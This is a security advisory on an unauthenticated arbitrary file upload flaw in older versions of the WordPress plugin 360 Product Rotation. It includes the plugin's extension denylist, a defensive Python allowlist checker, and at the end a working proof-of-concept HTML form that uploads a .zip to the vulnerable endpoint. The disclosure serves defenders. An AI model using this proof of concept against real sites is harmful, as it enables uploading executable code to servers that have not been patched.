Old Vulnerability Report: Arbitrary File Upload Vulnerability in 360 Product Rotation
One of the things that we do to provide our customers with the best data on WordPress plugin vulnerabilities is to monitor third party data on hacking attempts. That sometimes leads us to finding what looks to be exploitation of vulnerabilities that a hacker has just discovered in the current version of a plugin. In other cases it shows old vulnerabilities that hackers are still trying to exploit. We recently spotted an attempt to exploit an arbitrary file upload vulnerability in older versions of the plugin 360 Product Rotation. We couldn’t find a page that describes the issue to link to for our data on the vulnerability, so here are the details.
The hacking attempt involved a request sent to the page /includes/plugin-media-upload.php. Through that file you upload a .zip file and the contents are extracted and saved in a directory on the website.
While the feature that used this upload functionality looks to have been intended only for logged-in users (its front end was removed in version 1.2.4), there is no check to ensure that the person attempting the upload is logged in (we notified the developer about that).
Back when this feature was introduced in version 1.1.3 of the plugin, there was no restriction on what type of files could be included in the .zip file, leading to an arbitrary file upload vulnerability.
In version 1.2.1 a function was added to check if executable files are included in the .zip file:
```php
function getExcludedFiles($path) {
    // getDirContents() is the plugin's own directory-listing helper (not shown here).
    $files = getDirContents($path);
    $extensions_excluded = array('php', 'php3', 'py', 'sh');
    $files_excluded = array();
    foreach ($files as $k => $file) {
        $extension = strtolower(pathinfo($file, PATHINFO_EXTENSION));
        if (in_array($extension, $extensions_excluded)) {
            $files_excluded[] = $file;
        }
    }
    return $files_excluded;
}
```
If any executable files are found in the .zip, the files are not extracted from it.
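For contrast with the denylist above, here is the shape of check a defender would want in front of an archive upload: an allowlist of the file types the feature actually needs, a login gate (the post notes the plugin had none), and a refusal to extract entries whose paths are not safely relative. This is an added illustration written in Python, not the plugin's PHP code; the allowlist contents, the `is_logged_in` flag and the constructed sample archives are assumptions for the example, and the path check is general archive-extraction hygiene rather than anything the post reports about this plugin.

```python
import io
import posixpath
import zipfile

# Assumed allowlist: only the asset types a product-rotation feature plausibly
# needs. Anything else is rejected, instead of trying to enumerate "bad" types.
ALLOWED_EXTENSIONS = frozenset({"jpg", "jpeg", "png", "gif", "webp", "xml", "json", "txt"})


def is_safe_relative_path(name):
    """True only for paths that stay inside the extraction directory."""
    if name.startswith(("/", "\\")) or "\\" in name or "\x00" in name:
        return False
    norm = posixpath.normpath(name)
    return not (norm == ".." or norm.startswith("../"))


def rejected_entries(zip_bytes):
    """Return a list of (entry name, reason) for every entry that must block extraction."""
    problems = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            if info.is_dir():
                continue
            if not is_safe_relative_path(name):
                problems.append((name, "unsafe path"))
                continue
            base = posixpath.basename(name)
            if "." not in base:
                problems.append((name, "no extension"))
                continue
            ext = base.rsplit(".", 1)[1].lower()
            if ext not in ALLOWED_EXTENSIONS:
                problems.append((name, f"extension '{ext}' not in allowlist"))
    return problems


def screen_upload(zip_bytes, is_logged_in):
    """Decide whether an uploaded archive may be extracted at all.

    The login check comes first: an unauthenticated request is refused before
    the archive is even opened. Any rejected entry blocks the whole archive,
    mirroring the 1.2.1 behaviour of not extracting when a bad file is present.
    """
    if not is_logged_in:
        return {"allowed": False, "reason": "authentication required"}
    problems = rejected_entries(zip_bytes)
    if problems:
        return {"allowed": False, "reason": "; ".join(f"{n}: {r}" for n, r in problems)}
    return {"allowed": True, "reason": ""}


def build_zip(entries):
    """Build an in-memory .zip from {name: bytes}; used only to construct sample input."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed sample archives (not real uploads).
CLEAN_ZIP = build_zip({"spin/img_01.jpg": b"\xff\xd8", "spin/config.xml": b"<config/>"})
SCRIPT_ZIP = build_zip({"spin/img_01.jpg": b"\xff\xd8", "spin/index.php": b"<?php"})
TRAVERSAL_ZIP = build_zip({"../outside.jpg": b"\xff\xd8"})

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN_ZIP), ("script", SCRIPT_ZIP), ("traversal", TRAVERSAL_ZIP)):
        print(label, screen_upload(blob, is_logged_in=True))
    print("unauthenticated", screen_upload(CLEAN_ZIP, is_logged_in=False))
```

The allowlist is the important design choice: the plugin's 1.2.1 check only knows about four extensions and has to be kept up to date with everything a server might execute, whereas an allowlist only has to describe what the feature legitimately accepts.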
In a good reminder that you cannot rely on checking the changelog of a plugin to determine whether there has been a security fix, the only change listed for 1.2.1 was:
Bugfix: .zip file created on some Windows systems did not extract correctly
Proof of Concept
The following proof of concept will upload the selected .zip file and extract its contents into the directory /wp-content/uploads/yofla360/.
Make sure to replace “[path to WordPress]” with the location of WordPress. You will also need to include the HTTP request header “X-Requested-With” with the request.
```html
<html>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/360-product-rotation/includes/plugin-media-upload.php" method="POST" enctype="multipart/form-data">
<input type="file" name="FileInput" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
```